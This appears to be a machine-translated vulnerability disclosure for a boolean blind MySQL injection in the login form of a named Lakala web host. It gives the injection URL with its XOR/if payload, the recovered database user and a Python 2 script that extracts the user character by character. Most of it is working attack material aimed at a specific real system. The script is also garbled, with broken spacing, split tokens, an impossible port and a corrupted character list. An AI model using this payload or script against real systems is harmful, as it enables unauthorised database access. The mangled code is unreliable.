MySQL injection exists at a site in La Kala (with verification script)

MySQL injection exists at a site in La Kala (with verification script)

MySQL injection (with verification script) and bool blind exist in a website in La Kala.

Injection point:
 

POST http://jzlq.lakala.com:7070/pos/index.php?action=logincaptcha_keystring=1&password_login=&password_login_show=&username=aa"XOR(if(length(user())=15,1,0))OR"bb

The username parameter can be injected. Bool blind. True when "Enter new password" is displayed.

Verify the user () to obtain the following information:
 

auto1@localhost

 

Python script:
 

# Encoding = utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'content-type': 'application/x-www-form-urlencoded'} payloads = list ('signature @_. ') print 'start to retrive MySQL User: \ n' user = ''for I in range (1, 16): for payload in payloads: print '. ', conn = httplib. HTTPConnection ('jzlq .lakala.com: 808080', timeo Ut = 3) s = 'aa "XOR (if (ascii (mid (user () from (% s) for (1) = % s, 1, 0 )) OR "bb '% (I, ord (payload) conn. request (method = 'post', url = '/pos/index. php? Action = login ', body = 'aptcha _ keystring = & password_login = & password_login_show = & username =' + urllib. quote (s), headers = headers) html_doc = conn. getresponse (). read (). decode ('utf-8') conn. close () if html_doc.find (U' enter new password ')> 0: user + = payload sys. stdout. write ('\ r [In Progress]' + user) sys. stdout. flush () breakprint '\ n [Done] MySQL user is % s' % user

 

Solution:

Filter user names